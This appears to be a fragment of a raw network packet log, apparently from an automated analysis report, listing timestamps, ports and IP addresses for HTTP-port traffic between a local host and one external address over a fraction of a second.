Sep 27, 2024 00:29:07.469007969 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469008923 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469146967 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469175100 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469187975 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469197989 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469211102 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469222069 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469233990 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469244957 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469259024 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469264984 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469264984 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469264984 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469300985 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469311953 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469322920 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469333887 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469346046 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469374895 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469386101 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469396114 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469409943 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469409943 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469409943 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469409943 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469409943 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469409943 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469507933 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469520092 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469530106 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469542027 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469552994 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469564915 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469636917 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469647884 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469657898 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469669104 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469674110 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469674110 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469674110 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469674110 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469674110 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469674110 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469681025 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469831944 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469841957 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469854116 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469865084 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469882965 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469892979 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469903946 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469916105 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469927073 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469938040 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469950914 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469961882 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469963074 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469961882 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469961882 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469961882 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469961882 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470005989 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470036030 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470046997 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470057011 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470072985 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470077038 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470077991 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470077991 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470077991 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470077991 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470144987 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470159054 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470170021 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470181942 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470227003 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470227003 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470227003 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470227003 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470227003 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470227003 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470277071 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470290899 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470303059 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470315933 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470418930 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470432997 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470443964 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470455885 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470467091 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470472097 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470472097 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470472097 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470472097 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470483065 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470494986 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470505953 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470542908 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470556021 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470664024 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470678091 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470690012 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470704079 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470704079 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470704079 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470704079 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470704079 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470730066 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470741034 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470751047 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470763922 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470801115 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470810890 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470832109 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470832109 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470832109 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470832109 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470832109 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470856905 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470868111 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470879078 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.470973015 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470973015 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.470973015 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.471009016 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471019983 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471033096 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471065044 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471076012 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471086979 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471102953 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471111059 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471170902 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471180916 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471191883 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471206903 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.471206903 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.471206903 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.471206903 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.471206903 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.471206903 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.471240997 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471256971 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471283913 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471295118 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471306086 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471379995 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471398115 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471409082 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471419096 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471430063 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.471442938 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.471442938 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.471442938 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.471442938 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.471442938 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.472315073 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.472315073 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.559406042 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559448004 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559458017 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559469938 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559484005 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559495926 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559515953 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559526920 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559539080 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559581041 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559591055 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559601068 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559638977 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559648991 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559660912 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559670925 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.559705019 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.559705019 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.559705019 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.559705019 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.559705973 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.559705973 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560081005 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560129881 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560142040 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560241938 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560254097 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560265064 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560276031 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560287952 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560298920 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560312033 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560316086 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560316086 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560316086 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560316086 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560316086 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560324907 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560405016 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560415983 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560426950 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560440063 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560497046 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560497046 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560497046 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560497046 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560497046 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560564995 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560576916 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560606956 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560623884 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560636044 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560647964 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560659885 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560671091 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560688972 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560715914 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560715914 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560715914 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560715914 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560715914 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.560811043 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560822010 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560833931 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560843945 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560856104 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560868979 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560879946 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560985088 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.560995102 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561006069 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561017990 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561028957 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561032057 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561032057 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561033010 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561033010 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561033010 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561043024 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561058998 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561070919 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561081886 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561093092 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561105013 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561115980 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561130047 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561142921 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561171055 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561181068 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561187029 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561187029 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561187029 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561187029 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561187029 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561187029 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561197042 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561247110 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561258078 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561269045 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561353922 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561364889 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561374903 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561387062 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561398029 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561429024 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561429024 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561429024 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561429024 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561429024 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561429024 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561490059 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561521053 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561532974 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561549902 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561561108 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561573029 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561583996 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561595917 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561595917 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561595917 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561603069 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561621904 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561633110 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561645031 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561676979 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561676979 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561676979 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561708927 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561721087 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561731100 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561743021 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561809063 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561809063 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561809063 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.561841965 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561853886 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561866045 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561878920 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561891079 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561902046 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561912060 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561975002 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561985970 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.561996937 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562014103 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562014103 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562014103 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562014103 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562014103 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562041044 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562048912 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562048912 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562063932 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562077045 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562088966 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562232018 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562232018 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562232018 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562232971 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562233925 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562247038 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562258959 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562269926 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562280893 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562293053 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562305927 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562315941 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562329054 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562365055 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562365055 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562365055 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562365055 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562365055 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562400103 CEST	80	57901	147.45.44.104	192.168.2.6
